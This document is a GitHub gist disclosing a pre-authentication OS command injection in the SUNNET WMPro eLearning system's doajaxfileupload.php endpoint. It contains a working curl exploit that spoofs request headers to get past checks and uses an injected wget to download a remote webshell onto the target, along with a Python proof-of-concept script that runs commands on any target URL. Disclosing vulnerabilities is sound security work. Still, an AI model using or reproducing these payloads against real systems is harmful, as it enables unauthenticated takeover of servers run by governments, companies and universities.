Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?

Pre-auth OS Command Injection on SUNNET WMPro

Current Description

The WMPro v5.0 and v5.1 for eLearning system has OS Command Injection via "/teach/course/doajaxfileupload.php". This affects many eLearning system of governments, organizations, companies and universities. The target server can be exploited without authentication.

Details

The injection point is basePath parameter in "/teach/course/doajaxfileupload.php".

We execute OS Command via basePath paramemer without authentication.

Description

We can execute OS Command without authentication and upload the webshell to the target server.

Systems Affected

Compromised target servers with web shells uploaded.

Affected files

http://[Target Domain]/teach/course/doajaxfileupload.php

Proof of Concept

We use wget command to donwload remote webshell. Note that we need to set "X-Http-Forwarded-For" and "--user-agent" header to bypass request checking.

curl -H "X-Http-Forwarded-For: 127.0.0.1" --user-agent "elearn is good" -d "basePath=%3Bwget+2522842207+%2dO+webshell.php%3B" -X POST http://Target_Domain/teach/course/doajaxfileupload.php

PoC code:

import sys
import requests

url = '%s/teach/course/doajaxfileupload.php' % sys.argv[1]

cmd = 'echo "`whoami` on `hostname` has been hacked! "'
payload = ';%s;' % (cmd)
res = requests.post(url, data=dict(basePath=payload), headers={'User-Agent': 'elearn good', 'X-Http-Forwarded-For': '127.0.0.1'})
output = res.text
line_count = len(output.split('\n'))
if line_count > 1:
    line_count = (line_count-1) // 6 + 1
print('\n'.join(output.split('\n')[-line_count:-1]))

Usage: python poc.py [Target Domain]

If target domain can be exploited, it will echo "whoami on hostname has been hacked! " on the console.

Contributor

  • Tony Kuo (CHT Security)
  • Tree Chiu (CHT Security)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.